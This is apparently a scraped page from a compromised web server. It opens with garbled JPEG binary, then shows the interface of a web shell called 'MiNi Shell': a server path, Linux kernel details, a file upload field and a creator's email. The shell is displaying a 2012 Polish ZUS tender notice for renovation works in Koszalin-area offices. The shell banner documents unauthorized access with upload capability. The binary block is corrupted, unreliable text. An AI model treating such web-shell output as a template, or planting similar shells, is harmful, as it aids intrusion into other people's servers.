JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120531/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120531/181756-N-2012.html

<p class="kh_header"><b>Koszalin: Roboty remontowe w budynkach podległych Inspektoratów Oddziału ZUS w Koszalinie.</b><br>
<b>Numer ogłoszenia: 181756 - 2012; data zamieszczenia: 31.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Ubezpieczeń Społecznych Oddział w Koszalinie , ul. Juliana Fałata 30, 75-950 Koszalin, woj. zachodniopomorskie, tel. 94 3485500, 3485965, faks 94 3425262.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zus.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Roboty remontowe w budynkach podległych Inspektoratów Oddziału ZUS w Koszalinie..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są roboty remontowe w budynkach podległych Inspektoratów Oddziału ZUS w Koszalinie.

Przedmiot zamówienia został podzielony na pięć zadań:

zadanie nr 1 - roboty remontowe w Inspektoracie ZUS w Drawsku Pomorskim, ul. Sikorskiego 30;
-wymiana glazury w sanitariatach w ilości 90,24m2 , demontaż i ponowny montażu urządzeń sanitarnych, przełożenie płytek  chodnikowych i elementów schodowych z betonu płukanego wejścia głównego do budynku z wyprofilowaniem spadku, montaż listew antypoślizgowych na schodach zewnętrznych zejścia do kotłowni, remont garażu z częściową naprawą tynków i posadzki , malowanie wewnętrznych ścian w ilości 40,39m2, naprawa opaski wokół garażu oraz przełożenie polbruku z wyprofilowaniem spadku i regulacją wpustu kanalizacji ;

zadanie nr 2 - roboty remontowe w Inspektoracie ZUS w Drawsku Pomorskim, 
ul. Basztowa 1b;
-wymiana stolarki okiennej ( witryn aluminiowych) i drzwiowej zewnętrznej, uzupełnienie ścianki działowej gr. ? cegły w ilości 1,37m2 w pomieszczeniu składnicy akt wraz z osadzeniem stolarki drzwiowej, wykonanie tynku i malowanie;

zadanie nr 3 - roboty remontowe w Inspektoracie ZUS w Białogardzie , ul. Wojska Polskiego 56;
-wymiana wykładziny dywanowej na PCV w ilości 136,08m2 wraz z robotami towarzyszącymi w pomieszczeniu składnicy akt, adaptacja pomieszczenia o powierzchni 15m2 na potrzeby SOK z demontażem stolarki drzwiowej w ilości 2szt, rozebraniem okładziny ścian, ścianki gr ? cegły, wykonaniem ścianki z płyty GK, uzupełnieniem posadzki z płytek gress, montażem drzwi aluminiowych, malowaniem i uzupełnieniem sufitów podwieszanych ;

zadanie nr 4 - roboty remontowe w Inspektoracie ZUS w Kołobrzegu, 
ul. Łopuskiego 21;
-malowanie wraz z przygotowaniem powierzchni sali obsługi klienta w ilości 266,27m2, wymianie wykładziny dywanowej w pomieszczeniu sekretariatu w ilości 30,10m2 wraz z robotami  towarzyszącymi ;

zadanie nr 5 - roboty remontowe w Inspektoracie ZUS w Wałczu, ul. Dąbrowskiego 11;
-dostawa i montaż logo ZUS w budynku  Inspektoratu ZUS w  Wałczu;

Zakres robót należy wykonać zgodnie z opisem przedmiotu zamówienia, specyfikacją techniczną wykonania i odbioru robót , rysunkami, stanowiącymi załączniki do niniejszej specyfikacji istotnych warunków zamówienia. 

Szczegółowy zakres prac do wykonania zawierają przedmiary robót, stanowiące załączniki do specyfikacji istotnych warunków zamówienia.

Zapłata za wykonane i odebrane roboty będzie uregulowana  w terminie 30 dni od dostarczenia faktury do siedziby zamawiającego.
Wykonawca udzieli zamawiającemu gwarancji jakości na wykonane roboty na co najmniej 36 miesięcy .

Prace muszą być prowadzone z uwzględnieniem normalnej pracy Inspektoratów.
Wykonawca może wykonać całość robót własnymi siłami lub powierzyć do wykonania określone części zamówienia podwykonawcom.

Szczegółowe warunki realizacji zamówienia zostały zawarte we wzorze umowy stanowiącym załącznik  do SIWZ . 
Jest to zamówienie o wartości mniejszej niż kwoty określone w przepisach wydanych na podstawie art. 11 ust. 8 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publiczny.  

Zamawiający dopuszcza składanie ofert częściowych na jedną lub więcej części zamówienia..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.21.00.00-2, 45.43.12.00-9, 45.33.00.00-9, 45.40.00.00-1, 45.42.00.00-7, 45.43.21.11-5, 45.43.00.00-0, 45.44.00.00-3, 45.45.10.00-3, 45.45.30.00-7, 90.10.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 90.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> wadium nie wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-----</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeśli wykonawca wykaże, że w ciągu ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, wykonał należycie , co najmniej jedną robotę remontowo-budowlaną o wartości brutto co najmniej :
zad. nr 1 i zad. nr 3 - 15 000,00 zł ;  zad. nr 2 - 45 000,00 zł;     
Wykonawca zobowiązany jest do przedstawienia referencji potwierdzających że te roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-----</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli wykonawca wykaże, że dysponuje co najmniej jedną osobą, która będzie uczestniczyć w wykonywaniu zamówienia, posiadającą uprawnienia budowlane do wykonywania samodzielnych funkcji technicznych w budownictwie, w rozumieniu ustawy z dnia 7 lipca 1994r. Prawo budowlane (Dz.U. z 2006r. Nr 156, poz.1118 ze zm.) w zakresie  kierowania robotami budowlanymi : -w specjalności konstrukcyjno-budowlanej . 
Osoba musi być członkiem właściwej izby samorządu zawodowego.

Warunek posiadania uprawnień budowlanych , o których mowa wyżej ,nie ma zastosowania do obywateli państw członkowskich, którzy nabyli kwalifikacje zawodowe do wykonywania działalności w budownictwie, równoznacznej wykonywaniu samodzielnych funkcji technicznych w budownictwie na terytorium Rzeczypospolitej Polskiej, odpowiadające  zakresem uprawnieniom budowlanym  pozwalającym na pełnienie odpowiedniej funkcji w zakresie objętym umową , oraz posiadających odpowiednią decyzję o uznaniu kwalifikacji zawodowych.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-----</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Inne wymagane oświadczenia i dokumenty:
1. dokument , z którego wynika upoważnienie wykonawcy do podpisania oferty lub pełnomocnictwo do reprezentowania wykonawcy, o ile ofertę składa pełnomocnik.

2. w przypadku, gdy ofertę składają wykonawcy ubiegający się wspólnie o udzielenie zamówienia wymagane jest załączenie dokumentu pełnomocnictwa określającego zakres umocowania pełnomocnika ustanowionego do reprezentowania ich w postępowaniu, stosownie do art. 23 ust.2 ustawy Pzp.

3. jeżeli wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów , niezależnie od charakteru prawnego łączących go z nimi stosunków, zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie takich podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.

4. kosztorys ofertowy sporządzony wg załączonych przedmiarów robót.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zus.pl/zamówienia publiczne<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> siedzibie zamawiającego w Koszalinie ul. Fałata 30, pok. 318 lub pocztą - na wcześniejszy wniosek wykonawcy - fax: 94  348 12 33 lub 342 52 62. 
SIWZ jest bezpłatna..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.06.2012 godzina 11:00, miejsce: siedziba zamawiającego w Koszalinie , ul. Fałata 30 , Kancelaria (Dziennik Podawczy ).
Godziny pracy Kancelarii: od poniedziałku do piątku od 7.00 do 15.00..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie nie jest współfinansowane ze środków Unii Europejskiej. 
 Zamawiający nie przewiduje udzielenia zamówień  uzupełniających.
Zamawiający nie przewiduje zawarcia umowy ramowej.
Zamawiający nie przewiduje ustanowienia dynamicznego systemu zakupów..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> roboty remontowe w I/ZUS w Drawsku Pomorskim
ul. Sikorskiego 30;.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zadanie nr 1 - roboty remontowe w Inspektoracie ZUS w Drawsku Pomorskim, 
ul. Sikorskiego 30;
-wymiana glazury w sanitariatach w ilości 90,24m2 , demontaż i ponowny montażu urządzeń sanitarnych, przełożenie płytek  chodnikowych i elementów schodowych z betonu płukanego wejścia głównego do budynku z wyprofilowaniem spadku, montaż listew antypoślizgowych na schodach zewnętrznych zejścia do kotłowni, remont garażu z częściową naprawą tynków i posadzki , malowanie wewnętrznych ścian w ilości 40,39m2, naprawa opaski wokół garażu oraz przełożenie polbruku z wyprofilowaniem spadku i regulacją wpustu kanalizacji ;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.43.12.00-9, 45.33.00.00-9, 45.21.00.00-2, 45.43.00.00-0, 45.45.30.00-7, 90.10.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 90.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> roboty remontowe w I/ZUS w Drawsku Pomorskim ul. Basztowa 1b;.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zadanie nr 2 - roboty remontowe w Inspektoracie ZUS w Drawsku Pomorskim, 
ul. Basztowa 1b;
-wymiana stolarki okiennej ( witryn aluminiowych) i drzwiowej zewnętrznej, uzupełnienie ścianki działowej gr. ? cegły w ilości 1,37m2 w pomieszczeniu składnicy akt wraz z osadzeniem stolarki drzwiowej, wykonanie tynku i malowanie;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.42.00.00-7, 90.10.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 90.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> roboty remontowe w I/ZUS w Białogardzie 
ul. Wojska Polskiego 56;.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zadanie nr 3 - roboty remontowe w Inspektoracie ZUS w Białogardzie , ul. Wojska Polskiego 56;
-wymiana wykładziny dywanowej na PCV w ilości 136,08m2 wraz z robotami towarzyszącymi w pomieszczeniu składnicy akt, adaptacja pomieszczenia o powierzchni 15m2 na potrzeby SOK z demontażem stolarki drzwiowej w ilości 2szt, rozebraniem okładziny ścian, ścianki gr ? cegły, wykonaniem ścianki z płyty GK, uzupełnieniem posadzki z płytek gress, montażem drzwi aluminiowych, malowaniem i uzupełnieniem sufitów podwieszanych ;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.43.21.11-5, 45.40.00.00-1, 90.10.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 90.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> roboty remontowe w I/ZUS w Kołobrzegu, 
ul. Łopuskiego 21;.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zadanie nr 4 - roboty remontowe w Inspektoracie ZUS w Kołobrzegu, 
ul. Łopuskiego 21;
-malowanie wraz z przygotowaniem powierzchni sali obsługi klienta w ilości 266,27m2, wymianie wykładziny dywanowej w pomieszczeniu sekretariatu w ilości 30,10m2 wraz z robotami  towarzyszącymi ;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.43.21.11-5, 45.44.00.00-3, 90.10.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 90.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> roboty remontowe w I/ZUS w Wałczu 
ul. Dąbrowskiego 11;.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> zadanie nr 5 - roboty remontowe w Inspektoracie ZUS w Wałczu, ul. Dąbrowskiego 11;
-dostawa i montaż logo ZUS w budynku  Inspektoratu ZUS w  Wałczu;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.45.10.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 90.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com